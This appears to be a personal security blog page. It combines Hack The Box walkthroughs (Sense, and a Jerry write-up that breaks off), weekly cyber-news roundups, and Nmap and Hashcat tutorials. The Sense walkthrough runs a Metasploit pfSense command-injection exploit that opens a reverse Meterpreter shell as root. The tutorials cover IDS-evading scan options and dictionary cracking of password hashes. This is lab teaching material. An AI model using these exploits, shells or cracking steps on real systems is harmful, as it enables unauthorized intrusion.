██ ▄█▀▓█████ ██▀███ ██████ ▓█████ ▓█████▄ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒▒██ ▒ ▓█ ▀ ▒██▀ ██▌ ▓███▄░ ▒███ ▓██ ░▄█ ▒░ ▓██▄ ▒███ ░██ █▌ ▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄ ▒ ██▒▒▓█ ▄ ░▓█▄ ▌ ▒██▒ █▄░▒████▒░██▓ ▒██▒▒██████▒▒░▒████▒░▒████▓ ▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░░░ ▒░ ░ ▒▒▓ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░

KERSED

10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's ip address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based in FreeBSD. We can complete a quick Google search for the default credentials for pfSense and find the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice a /systems-users.txt, highlighted above in orange. This file is interesting because there could be user login information within the text file. We can view this file by navigating to the path on the web server by using our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!

Let's fire-up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >>

We see option #3 shows a module for an injection attack granting authentication. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >>

We set the RHOSTS to the target ip address, the USERNAME to "rohit", and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit using "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) >

Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.

10/04/2024

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted for 65 seconds. The attackers launched the attack by exploiting a network of vulnerable devices, including Asus routers and Mikrotik systems. This attack is the largest publicly recorded DDoS attack ever observed.

In comparison to previous large-scale DDoS attacks, this attack stands out due to its volume and duration. DDoS attacks work by overwhelming a target server with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign targeting Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely infected millions of servers and caused significant disruption. Researchers believe perfctl has been active for at least three years, exploiting vulnerabilities in Polkit (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

There is a new tactic used by FIN7 hackers to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. These arrests included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.

9/30/2024

Nmap Basics for Penetration Testing

          ___.-------.___
      _.-' ___.--;--.___ `-._
   .-' _.-'  /  .+.  \  `-._ `-.
 .' .-'      |-|-o-|-|      `-. `.
(_ <O__      \  `+'  /      __O> _)
  `--._``-..__`._|_.'__..-''_.--'
        ``--._________.--''

Nmap, short for Network Mapper, is a free and open-source tool widely used for network discovery and security auditing. Nmap utilizes raw IP packets in innovative ways to gather information about a network. It can identify available hosts, running services (including application name and version), operating systems, firewalls or packet filters in use, and many other details. Designed for rapid scanning of large networks, Nmap also works effectively for single hosts.

Network administrators rely on Nmap for various tasks, including creating network inventories, managing service upgrades, and monitoring uptime of hosts and services, while hackers may utilize it for enumeration i.e. identifying open ports running services that may be exploitable.

Nmap is available for most operating systems but is included with the Kali Linux distro. Remember to replace the placeholder ip address with your target ip address. You can also test this out by scanning the url: scanme.nmap.org. Let's start off with a basic Nmap scan. We can scan using an ip address or a host name i.e. scanme.nmap.org:

nmap 192.168.1.1

We can also scan a list of network/host targets within a text file using the following commands where "ip_list.txt" is the path to the text file.

nmap -iL ip_list.txt

When performing a penetration test on a network, we may want to perform a ping sweep scan, which pings all available hosts on a network by sending ICMP packets and returns the live hosts. Conducting a ping sweep is a crucial part of identifying active hosts on a network and lays the groundwork for a penetration test.

nmap -sn 192.168.0.0/24

Once we have the list of live hosts, we can then do port scans on the individual hosts. Note the "/24" addition to the ip address. This sets the ip address range. It will send an ICMP echo request to every ip address in the network from 192.168.0.1 to 192.168.0.255.

Nmap defaults to scanning the 1000 most commonly used ports. Port specification and scan order refer to the process of selecting which ports to scan during network reconnaissance. This is crucial for efficient scanning as it allows you to exclude irrelevant ports and prioritize the scan based on port usage frequency.

We can specify ports using the following command:

nmap -p 22,80,443 192.168.1.1

We can also scan for the operating system. This information helps pinpoint vulnerabilities specific to the operating system, enabling more effective attacks on the target system. We can use "-O" to enable OS detection.

nmap -O 192.168.1.1

What if we want to detect the services being run on open ports on the network? The service/version detection feature in Nmap provides valuable insights into the target system, enabling you to identify vulnerabilities and weaknesses on those ports. This option can be enabled by using "-sV".

nmap -sV 192.168.1.1

With the returned information, we can run a query using something like searchsploit for possible exploits for these services.

One of the most popular scans used is the SYN scan. A SYN scan involves sending an SYN packet to the target host and monitoring for a response. If the target responds with an SYN/ACK packet, the port is open; if it responds with an RST packet, the port is closed. This half-open scan technique, which doesn't complete the full TCP three-way handshake, is fast and, most importantly, stealthy, ideal for mapping large networks.

nmap -sS 192.168.1.1

Being stealthy is an important part of penetration testing. Some firewalls and Intrusion Detection System (IDS) solutions may temporarily block ip addresses that exhibit unusual network activity, such as high traffic volumes or sending network packets to multiple hosts in a systematic manner. We can mitigate these risks by using certain commands that effect the scans order and timing.

We can add the "-T" option to effect the scans timing template. By default, Nmap uses the "-T2" timing template but we can slow the scan down by using the "-T1" or "-T0" timing templates. These will slow down the scan process but will minimize the impact on the network and prevent triggering any alerts.

nmap -T1 192.168.0.0/24

You can also slow down an Nmap scan using delay. Use the "--scan-delay" option and specify the desired delay time in seconds.

nmap --scan-delay 3s 192.168.0.0/24

Let's change the order of targets we scan. Nmap's --randomize-hosts option can help you randomize your scans, making them less predictable and harder to detect by security.

nmap --randomize-hosts 192.168.0.0/24

One of the most powerful features of Nmap is it's ability to run scripts. The Nmap Script Engine (NSE) are scripts written in the programming language, Lua.

For example, you can run the following command that runs the "http-headers" script which pulls the HTTP headers configured on the target webserver.

nmap --script http-headers scanme.nmap.org

As a penetration tester, you may want to run the "vulners" script which automatically lists the vulnerabilities on a target using a CVE database.

nmap --script vulners 192.168.1.1

There are hundreds of NSE scripts available which you can view here.

9/27/2024

CyberChannel: Week of 9/22/24

Telegram's Privacy Policy Shift Raises Concerns

Telegram has updated its privacy policy to share user IP addresses and phone numbers with law enforcement upon receiving a valid court order. This change marks a significant departure from Telegram's previous stance, which only allowed for the disclosure of such information in cases involving terrorism suspects. This comes a month after the arrest and indictment of Pavel Durov, Telegram's co-founder.

The new policy expands the scope of data sharing to include situations where users are suspected of violating Telegram's Terms of Service. This could potentially include activities such as spreading hate speech, promoting illegal content, or engaging in other harmful behaviors. Telegram has emphasized that it will continue to fight for user privacy and only disclose information when legally required.

However, the new policy has raised concerns among privacy advocates. Some argue that it could lead to increased surveillance of users and make it easier for governments to track their activities. Others worry that the change could make Telegram less attractive to users who value privacy.

Kaspersky's Forced Removal and Replacement Raises Questions

In response to a US government ban, Kaspersky has taken the drastic step of deleting its antivirus software from US customers' computers. This unexpected move has left many users confused and concerned about their security.

Instead of simply removing its software, Kaspersky has replaced it with UltraAV, another antivirus product. The move is likely a direct consequence of the US government's decision to ban Kaspersky products from federal government networks due to concerns about potential ties to the Russian government. While Kaspersky has repeatedly denied any such connections, the ban has had a significant impact on the company's business.

Kia Dealer Portal Flaw Poses Serious Security Risk

A serious vulnerability has been discovered in Kia's dealer portal, which could potentially allow attackers to remotely exploit millions of Kia vehicles. The flaw could provide unauthorized access to critical car functions, posing a significant safety risk. The flaw also exposed sensitive personal information of car owners, including their name, phone number, email address, and physical address, potentially enabling attackers to register themselves as secondary users on the affected vehicles.

The vulnerability could be exploited to remotely unlock doors, start engines, or even control other vehicle systems. This could have serious consequences for both car owners and the general public. Kia has acknowledged the issue and is working on a patch to address the vulnerability.

Cyberattack Forces Kansas Water Plant to Manual Operations

A cyberattack on a Kansas water treatment facility has forced them to switch to manual operations, highlighting the growing concern about cyber threats targeting critical infrastructure.

The attack disrupted the facility's computer systems, making it impossible for operators to monitor and control the water treatment process. As a result, the facility was forced to revert to manual procedures, which are more time-consuming and prone to errors.

This incident underscores the importance of protecting critical infrastructure from cyberattacks. A successful attack on a water treatment facility could have serious consequences for public health and safety.

Islamophobic Cyberattack Disrupts UK Railway Stations

A cyber security incident targeting passengers at several key railway stations in the UK has resulted in an arrest. The incident involved displaying Islamophobic messages on the Wi-Fi login pages of stations like Manchester Piccadilly, Birmingham New Street, and several London terminals.

The culprit, identified as an employee of Global Reach Technology, a company providing Wi-Fi services to Network Rail, was apprehended based on suspicion of offenses under the Computer Misuse Act 1990 and the Malicious Communications Act 1988. Thankfully, no passenger data was compromised during the attack.

Android Malware Necro Infects Millions of Devices

A new Android malware called Necro has infected over 11 million devices through the Google Play Store via malicious advertising SDKs used by seemingly legitimate apps, Android game mods, and altered versions of popular software such as Spotify, WhatsApp, and Minecraft. Necro can steal sensitive information, such as login credentials and credit card details. It can also install other malware on infected devices. The malware was able to bypass Google Play's security measures and infect a large number of devices.

This incident serves as a reminder that users should be cautious about downloading apps from the Google Play Store. It is important to only download apps from trusted developers and to be aware of the potential risks associated with installing apps from unknown sources.

Romcom Malware Resurfaces with New Variant

A resurgence of "Romcom" malware has been observed, using a variant of the Snipbot banking trojan. This highlights the ongoing threat of malware targeting online banking credentials and the need for robust security measures when conducting financial transactions online.

"Romcom" malware is a family of malicious software that targets online banking customers. The malware is designed to steal login credentials and other sensitive information. It can also be used to transfer funds to unauthorized accounts.

The Snipbot banking trojan is known for its ability to evade detection by security software. The malware is being distributed through email attachments and malicious websites.

P. Diddy Gossip Used to Spread Malicious Software

A sophisticated remote access trojan (RAT) named "PdiddySploit" has been targeting victims using the celebrity gossip surrounding the arrest of P. Diddy. The RAT is designed to give attackers complete control over infected devices. It can be used to steal sensitive information, spy on victims, and launch further attacks. The attackers behind "PdiddySploit" are using a variety of social engineering tactics to lure victims into clicking on malicious links or downloading infected files.

These tactics include sending emails that appear to be from celebrities or news organizations. The emails often contain sensational headlines or offers of exclusive content. Once victims click on the malicious link or download the infected file, their devices are compromised.

9/24/2024

Password Cracking With Hashcat

 _._     _,-'""`-._
(,-.`._,'(       |\`-/|
    `-.-' \ )-`( , x x)
          `-    \`_`"'-

Hashcat is a command line interface password cracking tool for over 300 hashing algorithms. Hashcat can utilize five possible attack modes including brute-force, dictionary attacks, and more. We will be focusing on dictionary attacks, a more simple and faster attack mode that compares the hashed password to a wordlist rather than brute-force methods which can take a large amount of time and computer resources due to the attacks method of running combinations of random characters through trial and error.

We will be using the rockyou.txt password list. This password list was compiled back in 2009 after a major data breach at RockYou, a social media app and advertising network. The list contains over 14 million unique passwords that are commonly used amongst the general public and is a staple wordlist in the hacker community. You can view and download other password lists from here.

Passwords are usually discovered as hashes. Password hashing is the practice of algorithmically turning a plain-text password into ciphertext, or an irreversibly obfuscated version of itself, as a means of blocking against the threat of password breaches. This process helps secure passwords from the naked eye. There are many types of hashing algorithms including MD5, SHA-1, SHA-256, and hundreds of others. As mentioned earlier, Hashcat can crack over 300 different types of hashing algorithm. Below is a collection of downloadable hashed passwords which can be utilized for practice with Hashcat and the rockyou.txt password list. You can also hash your own passwords using online resources such as the All Hash Generator on Browserling.com.

Hashed Password Samples:
MD5Password.txt
SHA1Password.txt
SHA256Password.txt
CRC32Password.txt
NTLMPassword.txt

Hashcat can be downloaded on various operating systems but is included in the Kali Linux distro. We can crack our first MD5 hashed password in the samples above using the below command in our terminal:

hashcat –m 0 *path to MD5Password.txt* *path to rockyou.txt*

The first option of the command, "-m 0", sets the type of hash you are attempting to crack, 0 being MD5. You can view all the Hashcat hashing algorithms and their dedicated #'s using the command "hashcat --help". For example, 100 is to be used for SHA-1 hashes. If you do not know the hashing algorithm used in the password you are attempting to crack, you can use a hash identifying tool like hash-identifier which is included in Kali Linux distros.

The second option, "*path to MD5Password.txt*", directs Hashcat to the hashed password file path. For example /home/USERNAME/Downloads/MD5Password.txt, where USERNAME is your username. The final option of the command is the path to the wordlist you are running the attack against. Kali Linux includes many default wordlists, including rockyou.txt, in the /usr/share/wordlists path. Please note that you will need to unzip the rockyou.txt.gz directory on your machine if you haven't already by using the gunzip command.

Let's run the command and see what Hashcat comes up with:

hashcat -m 0 /root/Downloads/MD5Password.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 5 4600H with Radeon Graphics, 1425/2914 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

6104df369888589d6dbea304b59a32d4:blink182                 
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 6104df369888589d6dbea304b59a32d4
Time.Started.....: Tue Sep 24 15:54:28 2024 (0 secs)
Time.Estimated...: Tue Sep 24 15:54:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     9780 H/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344385 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> letmein
Hardware.Mon.#1..: Util: 66%

Started: Tue Sep 24 15:53:52 2024
Stopped: Tue Sep 24 15:54:30 2024

Success! After a few seconds we can see the hashed password, blink182, has been cracked at the line highlighted in orange. Blink-182 fans beware, your password isn't fooling even the most amateur of hackers out there.

Try using Hashcat with the other sample hashed passwords in this post, or hash your own passwords using the All Hash Generator on Browserling.com and see if your passwords are vulnerable to dictionary attacks using the rockyou.txt or other common wordlists. To learn more about Hashcat and it's other features, visit their Wiki here.

9/16/2024

HTB: Jerry

 ___  ___  _________  ________                        
|\  \|\  \|\___   ___\\   __  \  ___                  
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                 
 \ \   __  \   \ \  \ \ \   __  \|__|     _  _             
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___  (o)(o)--.           
   \ \__\ \__\   \ \__\ \ \_______\|\__\  \xx/ (  )       
    \|__|\|__|    \|__|  \|_______|\|__|  m\/m--m'`--.      
    ___  _______   ________  ________      ___    ___ 
   |\  \|\  ___ \ |\   __  \|\   __  \    |\  \  /  /|
   \ \  \ \   __/|\ \  \|\  \ \  \|\  \   \ \  \/  / /
 __ \ \  \ \  \_|/_\ \   _  _\ \   _  _\   \ \    / / 
|\  \\_\  \ \  \_|\ \ \  \\  \\ \  \\  \|   \/  /  /  
\ \________\ \_______\ \__\\ _\\ \__\\ _\ __/  / /    
 \|________|\|_______|\|__|\|__|\|__|\|__|\___/ /     
                                         \|___|/

Hack The Box's Jerry is an Easy Windows machine that features an Apache Tomcat web server which can easily be exploited with default login credentials and a reverse shell payload generated using MSFvenom.

ping 10.10.10.95

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 12:51 CDT
Nmap scan report for 10.10.10.95
Host is up (0.0088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds

We can see an Apache Tomcat web server running on port 8080. Let's navigate to the site by entering the target's ip address followed by port 8080 into the address bar of your web browser. Upon visual inspection of the page, we can see that we can gain access to the servers manager app through /manager/html. Unfortunately, we are faced with the login prompt.

Let's run the login through a wordlist of default credentials for Tomcat using Metasploit. Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
Metasploit tip: Use help <command> to learn more about any command
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >>

Let's search for Tomcat exploits using the "search" option.

search tomcat

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank       Check  Description
   -   ----                                                            ---------------  ----       -----  -----------
   0   auxiliary/dos/http/apache_commons_fileupload_dos                2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   1   exploit/multi/http/struts_dev_mode                              2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   2   exploit/multi/http/struts2_namespace_ognl                       2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3   exploit/multi/http/struts_code_exec_classloader                 2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   4   auxiliary/admin/http/tomcat_ghostcat                            2020-02-20       normal     Yes    Apache Tomcat AJP File Read
